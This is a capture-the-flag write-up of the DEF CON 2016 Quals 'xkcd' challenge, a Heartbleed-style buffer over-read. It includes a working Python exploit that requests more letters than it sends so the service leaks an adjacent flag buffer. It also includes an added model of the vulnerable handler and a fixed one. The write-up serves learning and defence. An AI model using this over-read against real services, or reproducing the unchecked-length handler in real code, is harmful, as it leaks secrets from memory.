Laboratory DEF CON CTF Quals 2016 - xkcd [1]

23 May 2016


You might want to read that comic as well: xkcd 1354 (Heartbleed Explanation).

We have a binary and a service running this binary.
A quick inspection revealed a reference to the xkcd comic explaining Heartbleed.

Our input data is stored in a globals buffer (in the .bss segment) that is 512 bytes long.
Right after that buffer sits flag_buffer, which holds the contents of the flag file.

So we can send 512 bytes of input to fill the globals buffer completely, so that our data runs right up to the flag buffer.
Then we ask the service to reply with a length (letter count) of 512 + the length of the flag; since it trusts that count, it echoes past our data and into the flag.
I determined the length of the flag empirically. Here is the final exploit:

import socket

# Challenge service and port from the writeup
address = 'xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me'
port = 1354

# 512 bytes of 'A' fill the globals buffer; asking for 512 + 29 letters makes
# the service echo past it into the adjacent flag buffer (29 = flag length,
# determined empirically)
payload = b'SERVER, ARE YOU STILL THERE? IF SO, REPLY "%s" (%d LETTERS)\n' % (b'A' * 512, 512 + 29)
print(payload)

s = socket.socket()
s.connect((address, port))
s.sendall(payload)  # send the request to the service
data = s.recv(2048)  # the reply contains our 512 'A's followed by the flag
print(data)

And we successfully got the flag.
The flag is: bl33ding h34rt5
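To make the bug concrete from the service side, here is an added example (not the challenge binary's code) that models the memory layout the writeup describes: a 512-byte globals buffer immediately followed by the flag buffer. It parses the challenge's request format, shows a handler that trusts the client-supplied letter count (the Heartbleed pattern), and a fixed handler that bounds the reply by what the client actually sent. The flag value is a constructed placeholder; the real flag file contents are not known here.

```python
import re

# Constructed model of the .bss layout from the writeup: a 512-byte globals
# buffer with the flag buffer placed immediately after it.
GLOBALS_SIZE = 512
FLAG = b"FLAG{constructed-placeholder}"  # stand-in for the flag file contents

# Request format used by the challenge service
REQUEST_RE = re.compile(
    rb'^SERVER, ARE YOU STILL THERE\? IF SO, REPLY "(.*)" \((\d+) LETTERS\)\n$',
    re.S,
)

def parse_request(msg: bytes):
    """Return (payload, claimed_length) or None if the message is malformed."""
    m = REQUEST_RE.match(msg)
    if m is None:
        return None
    return m.group(1), int(m.group(2))

def build_request(payload: bytes, claimed: int) -> bytes:
    """Build a request in the service's format with an arbitrary letter count."""
    return b'SERVER, ARE YOU STILL THERE? IF SO, REPLY "%s" (%d LETTERS)\n' % (payload, claimed)

def handle_vulnerable(msg: bytes) -> bytes:
    """Trusts the claimed length: replies with that many bytes starting at the
    globals buffer, so a count larger than the payload reads into the flag."""
    parsed = parse_request(msg)
    if parsed is None:
        return b"MALFORMED\n"
    payload, claimed = parsed
    memory = bytearray(GLOBALS_SIZE) + bytearray(FLAG)  # .bss: globals, then flag
    n = min(len(payload), GLOBALS_SIZE)
    memory[:n] = payload[:n]                # copy input into the globals buffer
    return bytes(memory[:claimed])          # no check of claimed vs len(payload)

def handle_fixed(msg: bytes) -> bytes:
    """Rejects oversized input and never echoes more bytes than were received."""
    parsed = parse_request(msg)
    if parsed is None:
        return b"MALFORMED\n"
    payload, claimed = parsed
    if len(payload) > GLOBALS_SIZE or claimed > len(payload):
        return b"NICE TRY\n"
    return payload[:claimed]
```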